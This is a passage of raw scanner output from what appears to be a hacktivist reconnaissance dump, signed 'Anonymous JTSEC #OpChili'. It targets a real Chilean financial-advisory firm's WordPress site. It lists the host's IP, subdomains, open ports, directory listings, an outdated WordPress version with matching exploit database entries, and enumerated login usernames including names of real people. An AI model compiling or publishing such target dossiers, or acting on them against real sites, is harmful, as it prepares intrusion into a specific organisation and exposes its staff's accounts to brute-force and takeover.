11380 | Confirmed By: Login Error Messages (Aggressive Detection)
11381
11382[+] guest_admin
11383 | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
11384 | Confirmed By: Login Error Messages (Aggressive Detection)
11385
11386[+] fjaviles
11387 | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
11388 | Confirmed By: Login Error Messages (Aggressive Detection)
11389
11390[+] admin_seo
11391 | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
11392 | Confirmed By: Login Error Messages (Aggressive Detection)
11393
11394[!] No WPVulnDB API Token given, as a result vulnerability data has not been output.
11395[!] You can get a free API token with 50 daily requests by registering at https://wpvulndb.com/users/sign_up
11396
11397[+] Finished: Mon Mar 2 06:22:56 2020
11398[+] Requests Done: 70
11399[+] Cached Requests: 9
11400[+] Data Sent: 19.354 KB
11401[+] Data Received: 686.991 KB
11402[+] Memory used: 138.547 MB
11403[+] Elapsed time: 00:00:49
11404#####################################################################################################################################
11405[+] URL: http://www.chilefa.cl/
11406[+] Started: Mon Mar 2 06:29:31 2020
11407
11408Interesting Finding(s):
11409
11410[+] http://www.chilefa.cl/
11411 | Interesting Entry: Server: nginx/1.14.0
11412 | Found By: Headers (Passive Detection)
11413 | Confidence: 100%
11414
11415[+] http://www.chilefa.cl/robots.txt
11416 | Interesting Entries:
11417 | - /wp-admin/
11418 | - /wp-includes/
11419 | Found By: Robots Txt (Aggressive Detection)
11420 | Confidence: 100%
11421
11422[+] http://www.chilefa.cl/fantastico_fileslist.txt
11423 | Found By: Fantastico Fileslist (Aggressive Detection)
11424 | Confidence: 70%
11425 | Reference: http://www.acunetix.com/vulnerabilities/fantastico-fileslist/
11426
11427[+] http://www.chilefa.cl/xmlrpc.php
11428 | Found By: Headers (Passive Detection)
11429 | Confidence: 100%
11430 | Confirmed By:
11431 | - Link Tag (Passive Detection), 30% confidence
11432 | - Direct Access (Aggressive Detection), 100% confidence
11433 | References:
11434 | - http://codex.wordpress.org/XML-RPC_Pingback_API
11435 | - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner
11436 | - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos
11437 | - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login
11438 | - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access
11439
11440[+] Upload directory has listing enabled: http://www.chilefa.cl/wp-content/uploads/
11441 | Found By: Direct Access (Aggressive Detection)
11442 | Confidence: 100%
11443
11444[+] http://www.chilefa.cl/wp-cron.php
11445 | Found By: Direct Access (Aggressive Detection)
11446 | Confidence: 60%
11447 | References:
11448 | - https://www.iplocation.net/defend-wordpress-from-ddos
11449 | - https://github.com/wpscanteam/wpscan/issues/1299
11450
11451[+] WordPress version 3.5.1 identified (Insecure, released on 2013-01-24).
11452 | Found By: Rss Generator (Passive Detection)
11453 | - http://www.chilefa.cl/feed/, <generator>http://wordpress.org/?v=3.5.1</generator>
11454 | - http://www.chilefa.cl/comments/feed/, <generator>http://wordpress.org/?v=3.5.1</generator>
11455
11456[+] WordPress theme in use: trymee
11457 | Location: http://www.chilefa.cl/wp-content/themes/trymee/
11458 | Readme: http://www.chilefa.cl/wp-content/themes/trymee/readme.txt
11459 | Style URL: http://www.chilefa.cl/wp-content/themes/trymee/style.css
11460 | Style Name: TryMee
11461 | Style URI: http://trymee.cmsmasters.net/
11462 | Description: The TryMee theme for WordPress created by CMSMasters is sophisticated, lightweight, and adaptable. M...
11463 | Author: cmsmasters
11464 | Author URI: http://cmsmasters.net/
11465 |
11466 | Found By: Css Style In Homepage (Passive Detection)
11467 | Confirmed By: Css Style In 404 Page (Passive Detection)
11468 |
11469 | Version: 1.3 (80% confidence)
11470 | Found By: Style (Passive Detection)
11471 | - http://www.chilefa.cl/wp-content/themes/trymee/style.css, Match: 'Version: 1.3'
11472
11473[+] Enumerating Users (via Passive and Aggressive Methods)
11474 Brute Forcing Author IDs - Time: 00:00:03 <============> (10 / 10) 100.00% Time: 00:00:03
11475
11476[i] User(s) Identified:
11477
11478[+] Gabriel Aviles
11479 | Found By: Rss Generator (Passive Detection)
11480 | Confirmed By: Rss Generator (Aggressive Detection)
11481
11482[+] gaviles
11483 | Found By: Rss Generator (Passive Detection)
11484 | Confirmed By:
11485 | Rss Generator (Aggressive Detection)
11486 | Author Id Brute Forcing - Author Pattern (Aggressive Detection)
11487 | Login Error Messages (Aggressive Detection)
11488
11489[+] admin
11490 | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
11491 | Confirmed By: Login Error Messages (Aggressive Detection)
11492
11493[+] javiles
11494 | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
11495 | Confirmed By: Login Error Messages (Aggressive Detection)
11496
11497[+] fjaviles
11498 | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
11499 | Confirmed By: Login Error Messages (Aggressive Detection)
11500
11501[+] guest_admin
11502 | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
11503 | Confirmed By: Login Error Messages (Aggressive Detection)
11504
11505[+] admin_seo
11506 | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
11507 | Confirmed By: Login Error Messages (Aggressive Detection)
11508
11509[!] No WPVulnDB API Token given, as a result vulnerability data has not been output.
11510[!] You can get a free API token with 50 daily requests by registering at https://wpvulndb.com/users/sign_up
11511
11512[+] Finished: Mon Mar 2 06:29:43 2020
11513[+] Requests Done: 20
11514[+] Cached Requests: 59
11515[+] Data Sent: 5.562 KB
11516[+] Data Received: 69.44 KB
11517[+] Memory used: 115.094 MB
11518[+] Elapsed time: 00:00:12
11519######################################################################################################################################
11520[INFO] ------TARGET info------
11521[*] TARGET: http://www.chilefa.cl/
11522[*] TARGET IP: 143.95.110.248
11523[INFO] NO load balancer detected for www.chilefa.cl...
11524[*] DNS servers: dns.site5.com.
11525[*] TARGET server: nginx/1.14.0
11526[*] CC: US
11527[*] Country: United States
11528[*] RegionCode: MA
11529[*] RegionName: Massachusetts
11530[*] City: Burlington
11531[*] ASN: AS62729
11532[*] BGP_PREFIX: 143.95.96.0/19
11533[*] ISP: ASMALLORANGE1, US
11534[INFO] DNS enumeration:
11535[*] ad.chilefa.cl 143.95.110.248
11536[*] admin.chilefa.cl 143.95.110.248
11537[*] ads.chilefa.cl 143.95.110.248
11538[*] alpha.chilefa.cl 143.95.110.248
11539[*] api.chilefa.cl 143.95.110.248
11540[*] api-online.chilefa.cl 143.95.110.248
11541[*] apolo.chilefa.cl 143.95.110.248
11542[*] app.chilefa.cl 143.95.110.248
11543[*] beta.chilefa.cl 143.95.110.248
11544[*] bi.chilefa.cl 143.95.110.248
11545[*] blog.chilefa.cl 143.95.110.248
11546[*] cdn.chilefa.cl 143.95.110.248
11547[*] events.chilefa.cl 143.95.110.248
11548[*] ex.chilefa.cl 143.95.110.248
11549[*] files.chilefa.cl 143.95.110.248
11550[*] ftp.chilefa.cl 143.95.110.248
11551[*] gateway.chilefa.cl 143.95.110.248
11552[*] go.chilefa.cl 143.95.110.248
11553[*] help.chilefa.cl 143.95.110.248
11554[*] ib.chilefa.cl 143.95.110.248
11555[*] images.chilefa.cl 143.95.110.248
11556[*] internetbanking.chilefa.cl 143.95.110.248
11557[*] intranet.chilefa.cl 143.95.110.248
11558[*] jobs.chilefa.cl 143.95.110.248
11559[*] join.chilefa.cl 143.95.110.248
11560[*] live.chilefa.cl 143.95.110.248
11561[*] login.chilefa.cl 143.95.110.248
11562[*] m.chilefa.cl 143.95.110.248
11563[*] mail.chilefa.cl 143.95.110.248
11564[*] mail2.chilefa.cl 143.95.110.248
11565[*] mobile.chilefa.cl 143.95.110.248
11566[*] moodle.chilefa.cl 143.95.110.248
11567[*] mx.chilefa.cl 143.95.110.248
11568[*] mx2.chilefa.cl 143.95.110.248
11569[*] mx3.chilefa.cl 143.95.110.248
11570[*] my.chilefa.cl 143.95.110.248
11571[*] new.chilefa.cl 143.95.110.248
11572[*] news.chilefa.cl 143.95.110.248
11573[*] ns1.chilefa.cl 143.95.110.248
11574[*] ns2.chilefa.cl 143.95.110.248
11575[*] ns3.chilefa.cl 143.95.110.248
11576[*] oauth.chilefa.cl 143.95.110.248
11577[*] old.chilefa.cl 143.95.110.248
11578[*] one.chilefa.cl 143.95.110.248
11579[*] open.chilefa.cl 143.95.110.248
11580[*] out.chilefa.cl 143.95.110.248
11581[*] outlook.chilefa.cl 143.95.110.248
11582[*] portfolio.chilefa.cl 143.95.110.248
11583[*] raw.chilefa.cl 143.95.110.248
11584[*] repo.chilefa.cl 143.95.110.248
11585[*] router.chilefa.cl 143.95.110.248
11586[*] search.chilefa.cl 143.95.110.248
11587[*] siem.chilefa.cl 143.95.110.248
11588[*] slack.chilefa.cl 143.95.110.248
11589[*] slackbot.chilefa.cl 143.95.110.248
11590[*] snmp.chilefa.cl 143.95.110.248
11591[*] stream.chilefa.cl 143.95.110.248
11592[*] support.chilefa.cl 143.95.110.248
11593[*] syslog.chilefa.cl 143.95.110.248
11594[*] tags.chilefa.cl 143.95.110.248
11595[*] test.chilefa.cl 143.95.110.248
11596[*] upload.chilefa.cl 143.95.110.248
11597[*] video.chilefa.cl 143.95.110.248
11598[*] vpn.chilefa.cl 143.95.110.248
11599[*] webconf.chilefa.cl 143.95.110.248
11600[*] webmail.chilefa.cl 143.95.110.248
11601[*] webportal.chilefa.cl 143.95.110.248
11602[*] wiki.chilefa.cl 143.95.110.248
11603[*] www2.chilefa.cl 143.95.110.248
11604[*] www3.chilefa.cl 143.95.110.248
11605[*] zendesk.chilefa.cl 143.95.110.248
11606[INFO] Possible abuse mails are:
11607[*] abuse@chilefa.cl
11608[*] abuse@websitewelcome.com
11609[*] abuse@www.chilefa.cl
11610[*] eig-abuse@endurance.com
11611[INFO] NO PAC (Proxy Auto Configuration) file FOUND
11612[ALERT] robots.txt file FOUND in http://www.chilefa.cl/robots.txt
11613[INFO] Checking for HTTP status codes recursively from http://www.chilefa.cl/robots.txt
11614[INFO] Status code Folders
11615[*] 200 http://www.chilefa.cl/wp-admin/
11616[*] 200 http://www.chilefa.cl/wp-includes/
11617[INFO] Starting FUZZing in http://www.chilefa.cl/FUzZzZzZzZz...
11618[INFO] Status code Folders
11619[ALERT] Look in the source code. It may contain passwords
11620[INFO] Links found from http://www.chilefa.cl/ http://143.95.110.248/:
11621[*] http://143.95.110.248/cgi-sys/defaultwebpage.cgi
11622[*] http://www.chilefa.cl/
11623[*] http://www.chilefa.cl//
11624[*] http://www.chilefa.cl/315-2/
11625[*] http://www.chilefa.cl/315-2/our-team/
11626[*] http://www.chilefa.cl/blog/
11627[*] http://www.chilefa.cl/chilean-income-tax-return-process-year-2019/
11628[*] http://www.chilefa.cl/chilean-income-tax-return-ty-2018/
11629[*] http://www.chilefa.cl/comments/feed/
11630[*] http://www.chilefa.cl/contact/
11631[*] http://www.chilefa.cl/es/
11632[*] http://www.chilefa.cl/es/servicios/
11633[*] http://www.chilefa.cl/feed/
11634[*] http://www.chilefa.cl/international-taxation-affidavits-tax-year-2019-commercial-year-2018/
11635[*] http://www.chilefa.cl/our-customers/
11636[*] http://www.chilefa.cl/portfolio/audit/
11637[*] http://www.chilefa.cl/portfolio/doing-business-in-chile-year-2019/
11638[*] http://www.chilefa.cl/portfolio/financial-planning/
11639[*] http://www.chilefa.cl/portfolio/legal-services/
11640[*] http://www.chilefa.cl/portfolio/mergers-and-acquisitions/
11641[*] http://www.chilefa.cl/portfolio/outsourcing-2/
11642[*] http://www.chilefa.cl/portfolio/tax-law-reform/
11643[*] http://www.chilefa.cl/portfolio/tax-planning/
11644[*] http://www.chilefa.cl/services/
11645[*] http://www.linkedin.com/company/chile-finance-advisors
11646cut: intervalle de champ incorrecte
11647Saisissez « cut --help » pour plus d'informations.
11648[INFO] BING shows 143.95.110.248 is shared with 16,100 hosts/vhosts
11649[INFO] Shodan detected the following opened ports on 143.95.110.248:
11650[*] 1
11651[*] 143
11652[*] 2086
11653[*] 2087
11654[*] 2096
11655[*] 22
11656[*] 3306
11657[*] 4
11658[*] 443
11659[*] 465
11660[*] 53
11661[*] 80
11662[*] 8080
11663[*] 8443
11664[*] 993
11665[*] 995
11666[INFO] ------VirusTotal SECTION------
11667[INFO] VirusTotal passive DNS only stores address records. The following domains resolved to the given IP address:
11668[INFO] Latest URLs hosted in this IP address detected by at least one URL scanner or malicious URL dataset:
11669[INFO] Latest files that are not detected by any antivirus solution and were downloaded by VirusTotal from the IP address provided:
11670[INFO] ------Alexa Rank SECTION------
11671[INFO] Percent of Visitors Rank in Country:
11672[INFO] Percent of Search Traffic:
11673[INFO] Percent of Unique Visits:
11674[INFO] Total Sites Linking In:
11675[*] Total Sites
11676[INFO] Useful links related to www.chilefa.cl - 143.95.110.248:
11677[*] https://www.virustotal.com/pt/ip-address/143.95.110.248/information/
11678[*] https://www.hybrid-analysis.com/search?host=143.95.110.248
11679[*] https://www.shodan.io/host/143.95.110.248
11680[*] https://www.senderbase.org/lookup/?search_string=143.95.110.248
11681[*] https://www.alienvault.com/open-threat-exchange/ip/143.95.110.248
11682[*] http://pastebin.com/search?q=143.95.110.248
11683[*] http://urlquery.net/search.php?q=143.95.110.248
11684[*] http://www.alexa.com/siteinfo/www.chilefa.cl
11685[*] http://www.google.com/safebrowsing/diagnostic?site=www.chilefa.cl
11686[*] https://censys.io/ipv4/143.95.110.248
11687[*] https://www.abuseipdb.com/check/143.95.110.248
11688[*] https://urlscan.io/search/#143.95.110.248
11689[*] https://github.com/search?q=143.95.110.248&type=Code
11690[INFO] Useful links related to AS62729 - 143.95.96.0/19:
11691[*] http://www.google.com/safebrowsing/diagnostic?site=AS:62729
11692[*] https://www.senderbase.org/lookup/?search_string=143.95.96.0/19
11693[*] http://bgp.he.net/AS62729
11694[*] https://stat.ripe.net/AS62729
11695[INFO] Date: 02/03/20 | Time: 06:31:38
11696[INFO] Total time: 2 minute(s) and 20 second(s)
11697######################################################################################################################################
11698[-] Target: http://www.chilefa.cl (143.95.110.248)
11699[M] Website Not in HTTPS: http://www.chilefa.cl
11700[I] Server: nginx/1.14.0
11701[L] X-Frame-Options: Not Enforced
11702[I] Strict-Transport-Security: Not Enforced
11703[I] X-Content-Security-Policy: Not Enforced
11704[I] X-Content-Type-Options: Not Enforced
11705[L] Robots.txt Found: http://www.chilefa.cl/robots.txt
11706[I] CMS Detection: WordPress
11707[I] Wordpress Version: 3.5.1
11708[M] EDB-ID: 47720 "WordPress Core 5.3 - User Disclosure"
11709[M] EDB-ID: 47800 "WordPress Core < 5.3.x - 'xmlrpc.php' Denial of Service"
11710[M] EDB-ID: 47557 "WordPress Core 5.2.4 - Cross-Origin Resource Sharing"
11711[M] EDB-ID: 47361 "WordPress 5.2.3 - Cross-Site Host Modification"
11712[M] EDB-ID: 47690 "WordPress Core < 5.2.3 - Viewing Unauthenticated/Password/Private Posts"
11713[M] EDB-ID: 46460-wordpress-5
11714[M] EDB-ID: 46511 "WordPress Core 5.0 - Remote Code Execution"
11715[M] EDB-ID: 46662 "WordPress 5.0.0 - Crop-image Shell Upload (Metasploit)"
11716[M] EDB-ID: 44949 "WordPress Core < 4.9.6 - (Authenticated) Arbitrary File Deletion"
11717[M] EDB-ID: 41963 "WordPress < 4.7.4 - Unauthorized Password Reset"
11718[M] EDB-ID: 41497 "WordPress < 4.7.1 - Username Enumeration"
11719[M] EDB-ID: 41223 "WordPress 4.7.0/4.7.1 - Content Injection (Python)"
11720[M] EDB-ID: 41224 "WordPress 4.7.0/4.7.1 - Content Injection (Ruby)"
11721[M] EDB-ID: 41962 "WordPress 4.6 - Remote Code Execution"
11722[M] EDB-ID: 42024 "WordPress PHPMailer 4.6 - Host Header Command Injection (Metasploit)"
11723[M] EDB-ID: 40288 "WordPress 4.5.3 - Directory Traversal / Denial of Service"
11724[M] EDB-ID: 36844 "WordPress 4.2 - Persistent Cross-Site Scripting"
11725[M] EDB-ID: 35414 "WordPress < 4.0.1 - Denial of Service"
11726[M] EDB-ID: 35413 "WordPress 4.0 - Denial of Service"
11727[M] EDB-ID: 47492 "WordPress Arforms 3.7.1 - Directory Traversal"
11728[M] EDB-ID: 28958-wordpress-3
11729[I] Wordpress Theme: trymee
11730[-] WordPress usernames identified:
11731[M] CFA_Editor
11732[M] Diego Avilés
11733[M] Gabriel Aviles
11734[M] admin
11735[M] admin_seo
11736[M] fjaviles
11737[M] gaviles
11738[M] guest_admin
11739[M] javiles
11740[M] XML-RPC services are enabled
11741[I] Autocomplete Off Not Found: http://www.chilefa.cl/wp-login.php
11742[-] Default WordPress Files:
11743[I] http://www.chilefa.cl/license.txt
11744[I] http://www.chilefa.cl/readme.html
11745[I] http://www.chilefa.cl/wp-includes/images/crystal/license.txt
11746[I] http://www.chilefa.cl/wp-includes/js/plupload/license.txt
11747[I] http://www.chilefa.cl/wp-includes/js/swfupload/license.txt
11748[I] http://www.chilefa.cl/wp-includes/js/tinymce/license.txt
11749[-] Searching Wordpress Plugins ...
11750[I] sitepress-multilingual-cms
11751[I] wpml-cms-nav
11752[I] Checking for Directory Listing Enabled ...
11753[L] http://www.chilefa.cl/wp-admin/css
11754[L] http://www.chilefa.cl/wp-admin/images
11755[L] http://www.chilefa.cl/wp-admin/includes
11756[L] http://www.chilefa.cl/wp-admin/js
11757[L] http://www.chilefa.cl/wp-admin/maint
11758[L] http://www.chilefa.cl/wp-content/themes
11759[L] http://www.chilefa.cl/wp-includes
11760[L] http://www.chilefa.cl/wp-includes/SimplePie
11761[L] http://www.chilefa.cl/wp-includes/Text
11762[L] http://www.chilefa.cl/wp-includes/css
11763[L] http://www.chilefa.cl/wp-includes/images
11764[L] http://www.chilefa.cl/wp-includes/js
11765[L] http://www.chilefa.cl/wp-includes/pomo
11766[L] http://www.chilefa.cl/wp-includes/theme-compat
11767[L] http://www.chilefa.cl/wp-content/plugins/sitepress-multilingual-cms
11768[L] http://www.chilefa.cl/wp-content/plugins/wpml-cms-nav
11769[-] Date & Time: 02/03/2020 06:32:43
11770[-] Completed in: 0:10:23
11771######################################################################################################################################
11772 Anonymous JTSEC #OpChili Full Recon #45